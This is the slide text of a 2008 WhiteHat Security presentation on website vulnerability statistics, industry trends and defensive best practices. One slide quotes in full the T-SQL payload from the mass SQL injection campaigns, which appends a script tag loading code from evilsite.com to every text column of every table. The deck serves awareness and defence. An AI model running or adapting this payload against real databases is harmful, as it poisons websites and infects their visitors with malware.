© 2008 WhiteHat Security, Inc.

Top Website Vulnerabilities: “Trends, Effects on Governmental Cyber Security, How to Fight Them.”

Jeremiah GrossmanWhiteHat Security founder & CTO

© 2008 WhiteHat Security, Inc.

Jeremiah GrossmanWhiteHat Security Founder & CTOTechnology R&D and industry evangelist(InfoWorld's CTO Top 25 for 2007)

Frequent international conference speakerCo-founder of the Web Application Security ConsortiumCo-author: Cross-Site Scripting Attacks

Former Yahoo! information security officer

2

Job Description: Hack Everything!

Official Title“the hacker yahoo”

3

Protect this website and the ~599 others

Find the vulnerabilities before the bad guys

4

5

© 2008 WhiteHat Security, Inc.

WhiteHat Sentinel• Unlimited Assessments – customer controlled and expert managed – the ability to scan websites no matter how big or how often they change

• Coverage – authenticated scans to identify technical vulnerabilities and custom testing to uncover business logical flaws

• Virtually Eliminate False Positives – Operations Team verifies results and assigns the appropriate severity and threat rating

• Development and QA – WhiteHat Satellite Appliance allows us to service intranet accessible systems remotely

• Improvement & Refinement – real-world scans enable fast and efficient updates

6

© 2008 WhiteHat Security, Inc.

SymantecQualysNessusnCircle

WhiteHat Security

“well-known” vulnerabilities

Vulnerability Stack

7

Custom Web Applications, Custom Vulnerabilities

Data is unique from reports distributed by Symantec, Mitre (CVE), IBM (ISS) X-Force, SANS, and others. These organizations track publicly disclosed vulnerabilities in commercial and open source software products, which may contain Web application flaws as well. WhiteHat Security’s data is different because it focuses solely on previously unknown vulnerabilities in custom web applications, code unique to that organization, on real-world websites

168,000,000 websites

millions more added per month

8

809,000 websites use SSL

protecting password, credit card numbers, social security numbers,

and our email (if we’re lucky).

9

9 out of 10 websites have vulnerabilities

allowing hackers unauthorized access

10

hacked

11

A new infected Web page is discovered every:5 seconds 24 hours a day365 days a year

Over 79% of websites hosting malicious code are legitimate(compromised by attackers)

12

© 2008 WhiteHat Security, Inc.

Likelihood that a website has a vulnerability, by Class

WhiteHat Security: Top 1013

© 2008 WhiteHat Security, Inc.

Likelihood that a website has a vulnerability, by severity

But how bad is it really?

Websites with Urgent, Critical, or High severity issues technically would not pass PCI compliance

14

© 2008 WhiteHat Security, Inc.

Percentage of vulnerabilities ranked by severity

Another way to look at the badness15

© 2008 WhiteHat Security, Inc.

Overall vulnerability population16

© 2008 WhiteHat Security, Inc.

Technology Breakdownfile extensions

17

© 2008 WhiteHat Security, Inc.

Industry VerticalsPercentage of websites with either URGENT, CIRTICAL or HIGH severity vulnerabilities

ranked by industry

18

© 2008 WhiteHat Security, Inc.

Worst of the WorstPercentage of vulnerability classes in overall

population ranked by industry

19

© 2008 WhiteHat Security, Inc.

Data input correlation20

Average inputs per website:154Ratio of vulnerability/inputs: 2.2%

Average Time to Fix in Days

180 270 365

21

Website Founded

Amazon 1994

Yahoo 1995

eBay 1995

Bank of America 1997

Google 1998

MySpace 2003

YouTube 2005

Vulnerability Attack

Buffer Overflow 1996

Command Injection 1996

SQL Injection 2004

XSS 2005

Predictable Resource Location ?

HTTP Response Splitting 2005 / ?

CSRF ?

More major websites were launched before significant classes of attack were “well-known”

22

If there’s just 1 vulnerability on 90% of the SSL websites...Other reports say an average of 7

728,100 total vulnerabilities

23

XSSed.com has reported:

20,843 total vulnerabilities

1,072 fixed (5%)

24

25

1. Google recon for weak websites (*.asp, *.php)2. Generic SQL Injection populates databases with malicious JavaScript IFRAMEs.3. Visitors arrive (U.N., DHS, etc.) and their browser auto-connects to a malware server infecting their machine with trojans.4. Botnets form with then continue SQL injecting websites

Mass SQL Injection

26

DECLARE @T varchar(255), @C varchar(255);DECLARE Table_Cursor CURSOR FORSELECT a.name, b.nameFROM sysobjects a, syscolumns bWHERE a.id = b.id AND a.xtype = 'u' AND(b.xtype = 99 ORb.xtype = 35 ORb.xtype = 231 ORb.xtype = 167);OPEN Table_Cursor;FETCH NEXT FROM Table_Cursor INTO @T, @C;WHILE (@@FETCH_STATUS = 0) BEGINEXEC('update [' + @T + '] set [' + @C + '] =rtrim(convert(varchar,[' + @C + ']))+''<script src=http://evilsite.com/1.js></script>''');FETCH NEXT FROM Table_Cursor INTO @T, @C;END;CLOSE Table_Cursor;DEALLOCATE Table_Cursor;

27

28

2006, 0.3% of all Internet queries return at least one URL containing malicious content.

2007 - 1.3%

2008 - ?

29

30

31

© 2008 WhiteHat Security, Inc.

Best PracticesAsset Tracking – Find your websites, assign a responsible party, and rate their importance to the business. Because you can’t secure what you don’t know you own.

Measure Security – Perform rigorous and on-going vulnerability assessments, preferably every week. Because you can’t secure what you can’t measure.

Development Frameworks – Provide programmers with software development tools enabling them to write code rapidly that also happens to be secure. Because, you can’t mandate secure code, only help it.

Defense-in-Depth – Throw up as many roadblocks to attackers as possible. This includes custom error messages, Web application firewalls, security with obscurity, and so on. Because 9 in 10 websites are already insecure, no need to make it any easier.

32

For more information visit: www.whitehatsec.com/

Jeremiah Grossman, founder and CTOblog: http://jeremiahgrossman.blogspot.com/email: jeremiah@whitehatsec.com

Thank You